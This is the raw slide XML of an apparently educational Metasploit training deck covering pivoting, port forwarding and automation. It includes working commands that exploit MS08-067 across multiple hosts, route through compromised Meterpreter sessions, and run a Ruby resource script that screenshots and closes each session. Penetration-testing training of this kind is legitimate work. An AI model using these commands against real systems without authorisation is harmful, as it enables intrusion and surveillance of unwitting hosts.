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7" r:id="rId5"/>
    <p:sldId id="294" r:id="rId6"/>
    <p:sldId id="295" r:id="rId7"/>
    <p:sldId id="296" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="333" r:id="rId10"/>
    <p:sldId id="339" r:id="rId11"/>
    <p:sldId id="340" r:id="rId12"/>
    <p:sldId id="305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268" r:id="rId23"/>
    <p:sldId id="2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>
        <p:scale>
          <a:sx n="108" d="100"/>
          <a:sy n="108" d="100"/>
        </p:scale>
        <p:origin x="736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D4924-80F6-1744-B12F-7D1FB074332C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/18/17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78EB0-032F-FD47-8B56-19F6DA6C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0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6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9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7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alphaModFix amt="67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042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E631-D1DE-CA43-90A0-C7E80C2FC209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apid7/metasploit-framework/blob/master/msfd" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/metasploit" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/egyp7" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/jduck" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hermit_hacker" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolingus.net/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.stackattack.net/blo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ffensive-security.com/metasploit-unleashe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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Framework (MSF) Fundamentals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800" dirty="0" smtClean="0"/>
              <a:t>Module Type: Basic Method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Module Number: 0x04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Last Updated: 2017-03-07</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Author: Hermit</a:t>
            </a:r>
            <a:endParaRPr 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74072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Part 3 of 3:  Pivoting and Automation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2059"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common Terminology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Quick Review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pivoting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Port Forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Automation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314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Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A method of interaction which allows for an unintended action to occur in response to an unexpected, invalid, or otherwise unaccounted for input of some form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit (‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sploit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 piece of code that is designed to exploit a vulnerability to allow for an unintended action.</a:t>
            </a:r>
          </a:p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There are three key module types in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: exploit modules, post-exploit modules, and auxiliary modules.  Exploit modules take advantage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerabities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to gain an initial foothold on the system.  Post-exploit modules collect information, escalate privileges, or otherwise expand upon the foothold achieved through an exploit module.  Auxiliary modules perform functions unrelated to exploitation.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3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Meterpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A Swiss army knife payload that allows for modular enhancement, routing, secondary exploitation, and control.  A solid first-choice.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An open connection to a remote system through which commands, modules, or network traffic may be directed or routed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pivoting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using one system to bridge between two networks, typically to move into a more privileged or restricted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Selecting vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Selecting payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loading post-exploitation modules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3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Compromise a target system via the exploit of your choice and a Meterpreter payload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the Meterpreter shell, determine what networks are available:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800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&gt; ipconfig /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all</a:t>
            </a:r>
            <a:b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Ethernet adapter Local Area Connection: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          Physical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Address.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00-00-00-01-00-00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        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IP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Address. . . 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192.168.1.35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          Subnet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Mask . . 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255.255.255.0</a:t>
            </a:r>
            <a:b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Ethernet adapter Local Area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Connection 2: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          Physical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Address.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00-00-00-99-99-99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        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IP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Address. . . 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10.10.10.35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800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          Subnet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Mask . . . . . . . . . . . : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>255.255.255.0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938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Pivoting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3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In the Meterpreter shell, run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autoroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to establish a route to the new network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill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&gt; run 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autoroute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-s 10.10.10.0/24</a:t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[*] Adding a route to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10.10.10.0/255.255.255.0...</a:t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[+]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Added route to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10.10.10.0/255.255.255.0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via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192.168.1.35</a:t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[*]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Use the -p option to list all active routes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="E7E6E6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>
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify the route has been added:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
            </a:b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&gt; run </a:t>
            </a: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autoroute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-p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mr-IN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Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN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Routing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN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Table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====================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Subnet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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN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Netmask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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN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Gateway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------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   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-------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     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-------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10.1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.1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.0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255.255.255.0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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN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Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="E7E6E6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pPr marL="514350" lvl="0" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Background the session</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
            </a:b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&gt;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background</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E7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Pivoting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6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now just run commands like you normally would, but targeting the new network, and it will automatically route through this connection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="E7E6E6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 Forwarding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say there is a target service on a second level network (one that you can only reach in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> by using routing through a Meterpreter session) that you want to exploit, but the tool to do so isn’t available in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and you don’t have the time, effort, or expertise to do so.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> provides an easy way to handle this through port forwarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in essence the remote port gets mapped to a local port accessible by your operating system, and any tool can then use this to directly connect.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158249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 Forwarding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begin, compromise a remote target and establish routing to make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> aware of the path.  We’ll assume that our machine is 10.20.30.200 and the remove target is 192.168.33.44 (from a dual-homed system at 10.20.30.123 and 192.168.33.50 which has been compromised with Meterpreter running, not that this makes a lot of difference).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run </a:t>
            </a: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autoroute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-s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192.168.33.0/24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Next, use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> command to add the forwarding port (-l is the local port to use, -p is the remote port, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>r is the remote system):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portfwd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add -l 4480 -p 80 -r 192.168.33.44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000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Forwarding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port 4480 on your local machine is acting as a forward to port 80 on 192.168.33.44.  For instance, you could directly connect to that remote system on port 80 using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in a regular (non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) shell: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netcast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localhost 4480</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5637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of the work you’ve gone through to this point has prepared you for what comes next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> automating these attacks.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Let’s assume that you have one exploit that you want to try on every host you get back from a scan (perhaps you’re targeting a corporate environment in a penetration test and they use a common build).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You now know how to do this via the MSF Console, but it’s much more efficient to let this stuff run automatically in the background.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E7E6E6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sake of this demonstration, we’ll assume that you want to use the MS08-067 exploit we’ve used for the examples so far.  To review, in the MSF Console you would issue the following commands (responses excluded for brevity):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pP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&gt; use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exploit/windows/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/ms08_067_netapi</a:t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exploit(ms08_067_netapi) &gt; set RHOST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10.20.30.100</a:t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exploit(ms08_067_netapi) &gt; set payload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windows/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exploit(ms08_067_netapi) &gt; set LHOST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10.20.30.200</a:t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exploit(ms08_067_netapi) &gt; set LPORT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54321</a:t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exploit(ms08_067_netapi) &gt;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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E7E6E6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endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E7E6E6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we run that on multiple hosts, we really only need to update the target host each time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a perfect candidate for automation!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We will use the “-x” option to pass a series of commands to the MSF Console on startup (note that the following is all one line, run from a root shell in a terminal session):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pP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root@kali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:~# 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msfconsole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-x “use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exploit/windows/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/ms08_067_netapi; set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payload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windows/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; set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LHOST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10.20.30.200; set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LPORT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54321; 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set RHOST 10.20.30.100;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exploit; set RHOST 10.20.30.101; exploit; set RHOST 10.20.30.102; exploit; exit”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E7E6E6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solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Each command will be run as if you typed it into the MSF console manually.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E7E6E6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E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Of course, in this case you’d have to manually work each session yourself.  What if you wanted to automatically take an action each time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and close the session instead?  Or what if you just want to collect backgrounded sessions for future efforts?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This is where a custom resource file comes into play!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E7E6E6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E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom resource files can be simple text files with commands (such as the command line pass we just did), but they can also be Ruby code.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We’ll use a variation of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonstraton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code the HD Moore released when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> added Ruby support to demonstrate each of these use cases.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4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 (Ruby Resource)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use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exploit/multi/handler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set PAYLOAD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windows/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set LPORT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31337</a:t>
            </a:r>
            <a:b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nb-NO" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>10.20.30.200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO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nb-NO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nb-NO" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO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b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>ExitOnSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> false</a:t>
            </a:r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&lt;ruby&gt;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sleep(1)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print_status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("Waiting on an incoming sessions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...")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while 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true)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framework.sessions.each_pair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do |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sid,s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|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thost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= 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s.session_host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# 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Ensure that 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stdapi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has been loaded before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running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if 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s.ext.aliases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['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stdapi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']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print_status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("Screenshotting session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sid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thost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}...")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s.console.run_single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("screenshot -p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thost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}_#{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sid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}.jpg -v false -q 85") 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print_status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("Closing session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sid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thost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}...")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s.kill</a:t>
            </a:r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else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print_status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("Session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sid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 #{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thost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 active, but not yet configured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end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end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sleep(1)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end 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print_status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("All done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")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&lt;/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ruby&gt;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E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So what does that code do?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It loads a generic handler for exploits (something that all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Meterpreters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can connect to)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It prints out the status of incoming connections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It ensures that the STDAPI module is loaded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It captures a screenshot from the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It closes the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04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load it we just run the MSF Console with the option to process a particular resource file (this file, which we’ll call “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>autoscreen.rc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”):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root@kali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:~#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msfconsole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-r ~/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autoscreen.rc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Now when the MSF Console loads this will automatically begin and process sessions.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0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r-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> but how do we automate this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First, fire up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to get a persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> instance (the -q suppresses the banner, and the -p specifies the port):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root@kali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:~#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msfd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-q -p 31337</a:t>
            </a:r>
            <a:b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[*] Initializing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msfd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[*] Running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msfd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endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="E7E6E6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>remove the lines for the payload from the previous resource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file and let’s source that in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> session.  This window will be our status monitor:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="14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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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:~# </a:t>
            </a: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echo “resource /path/to/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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resource.file</a:t>
            </a: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” | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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netcat</a:t>
            </a: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localhost 31337</a:t>
            </a:r>
            <a:b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[*] Processing /path/to/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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resource.file</a:t>
            </a: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for ERB directives</a:t>
            </a:r>
            <a:b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[*] resource (/path/to/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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resource.file</a:t>
            </a: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)&gt; Ruby Code (576 bytes)</a:t>
            </a:r>
            <a:b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[*] Waiting on incoming sessions...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E7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in another window we can loop through (in whatever manner we’d like) our targets by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>piping command sequences into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, using the -n and -e switches, e.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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root@kali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:~# echo -n -e “use exploit/windows/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/ms08_067_netapi\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nset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payload windows/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\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nset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LHOST 10.20.30.200\</a:t>
            </a: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nset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LPORT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54321\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nset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RHOST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$IPADDRESS\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nexploit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\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nexit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”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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E7E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voila! Quick looping and processing of targets!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4057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8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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Unleased: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://www.offensive-security.com/metasploit-unleashed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Sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Ruby Resource File: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github.com/rapid7/metasploit-framework/blob/master/msfd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: The Penetration Tester’s Guide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www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Social Media</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://twitter.com/metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Official account)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://twitter.com/egyp7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
